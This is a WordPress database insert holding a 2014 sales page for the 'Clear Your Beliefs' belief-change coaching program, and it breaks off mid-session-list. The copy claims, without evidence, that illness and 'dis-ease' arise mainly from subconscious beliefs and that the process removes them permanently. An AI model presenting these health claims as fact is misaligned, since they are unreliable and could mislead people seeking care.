INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2047, 2, '2014-12-14 14:13:42', '2014-12-14 19:13:42', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n&nbsp;\n<p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True 